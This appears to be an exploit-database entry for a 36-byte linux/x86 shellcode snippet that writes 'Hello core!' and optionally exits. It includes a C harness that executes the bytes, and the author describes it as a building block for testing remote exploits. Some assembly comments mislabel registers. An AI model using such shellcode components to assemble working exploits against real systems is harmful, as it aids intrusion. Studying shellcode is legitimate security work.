Search...

linux/x86 write(0,"Hello core! ",12); (w/optional 7 byte exit) 36 bytes

2005-11-09T00:00:00

ID 1337DAY-ID-7129
Type zdt
Reporter Charles Stevenson
Modified 2005-11-09T00:00:00

Description

Exploit for linux/x86 platform in category shellcode

                                        
                                            ========================================================================
linux/x86 write(0,"Hello core!\n",12); (w/optional 7 byte exit) 36 bytes
========================================================================






/* writehello-core.c by Charles Stevenson &lt;[email protected]&gt; 
 *
 * I made this as a chunk you can paste in to make modular remote
 * exploits.  I use it to see if my dup2_loop worked.  If you don't
 * get "Hello core!\n" back it's a good indicator your shell won't
 * be functional the way you'd like.
 */
char hellcode[] = /* write(0,"Hello core!\n",12); linux/x86 by core */
"\x31\xdb"              // xor  %ecx,%ecx
"\xf7\xe3"              // mul  %ecx
"\x53"                  // push %ecx
"\x68\x72\x65\x21\x0a"  // push $0xa216572
"\x68\x6f\x20\x63\x6f"  // push $0x6f63206f
"\x68\x48\x65\x6c\x6c"  // push $0x6c6c6548
"\xb2\x0c"              // mov  $0xc,%dl
"\x43"                  // inc  %ebx
"\x89\xe1"              // mov  %esp,%ecx
"\xb0\x04"              // mov  $0x4,%al
"\xcd\x80"              // int  $0x80
// not needed.. makes it exit cleanly
// 7 bytes _exit(1) ... 'cause we're nice &gt;:) by core
"\x31\xc0"              // xor  %eax,%eax
"\x40"                  // inc  %eax
"\x89\xc3"              // mov  %eax,%ebx
"\xcd\x80"              // int  $0x80
;

int main(void)
{
  void (*shell)() = (void *)&hellcode;
  printf("%d byte (w/optional 7 byte exit) write(0,\"Hello core!\\n\",12); linux/x86 by core\n",
         strlen(hellcode));
  shell();
  return 0;
}



#  0day.today [2018-01-06]  #

JSON Vulners Source

Initial Source

{"published": "2005-11-09T00:00:00", "id": "1337DAY-ID-7129", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for linux/x86 platform in category shellcode", "enchantments": {"score": {"value": 1.1, "vector": "NONE", "modified": "2018-01-06T07:04:21", "rev": 2}, "dependencies": {"references": [{"type": "nessus", "idList": ["SUSE_SU-2016-2328-1.NASL", "APPLETV_11.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:7129", "SECURITYVULNS:VULN:4147"]}], "modified": "2018-01-06T07:04:21", "rev": 2}, "vulnersScore": 1.1}, "type": "zdt", "lastseen": "2018-01-06T07:04:21", "edition": 2, "title": "linux/x86 write(0,\"Hello core!\n\",12); (w/optional 7 byte exit) 36 bytes", "href": "https://0day.today/exploit/description/7129", "modified": "2005-11-09T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "cvelist": [], "sourceHref": "https://0day.today/exploit/7129", "references": [], "reporter": "Charles Stevenson", "sourceData": "========================================================================\r\nlinux/x86 write(0,\"Hello core!\\n\",12); (w/optional 7 byte exit) 36 bytes\r\n========================================================================\r\n\r\n\r\n\r\n\r\n\r\n\r\n/* writehello-core.c by Charles Stevenson <[email\u00a0protected]> \r\n *\r\n * I made this as a chunk you can paste in to make modular remote\r\n * exploits. I use it to see if my dup2_loop worked. If you don't\r\n * get \"Hello core!\\n\" back it's a good indicator your shell won't\r\n * be functional the way you'd like.\r\n */\r\nchar hellcode[] = /* write(0,\"Hello core!\\n\",12); linux/x86 by core */\r\n\"\\x31\\xdb\" // xor %ecx,%ecx\r\n\"\\xf7\\xe3\" // mul %ecx\r\n\"\\x53\" // push %ecx\r\n\"\\x68\\x72\\x65\\x21\\x0a\" // push $0xa216572\r\n\"\\x68\\x6f\\x20\\x63\\x6f\" // push $0x6f63206f\r\n\"\\x68\\x48\\x65\\x6c\\x6c\" // push $0x6c6c6548\r\n\"\\xb2\\x0c\" // mov $0xc,%dl\r\n\"\\x43\" // inc %ebx\r\n\"\\x89\\xe1\" // mov %esp,%ecx\r\n\"\\xb0\\x04\" // mov $0x4,%al\r\n\"\\xcd\\x80\" // int $0x80\r\n// not needed.. makes it exit cleanly\r\n// 7 bytes _exit(1) ... 'cause we're nice >:) by core\r\n\"\\x31\\xc0\" // xor %eax,%eax\r\n\"\\x40\" // inc %eax\r\n\"\\x89\\xc3\" // mov %eax,%ebx\r\n\"\\xcd\\x80\" // int $0x80\r\n;\r\n\r\nint main(void)\r\n{\r\n void (*shell)() = (void *)&hellcode;\r\n printf(\"%d byte (w/optional 7 byte exit) write(0,\\\"Hello core!\\\\n\\\",12); linux/x86 by core\\n\",\r\n strlen(hellcode));\r\n shell();\r\n return 0;\r\n}\r\n\r\n\r\n\n# 0day.today [2018-01-06] #"}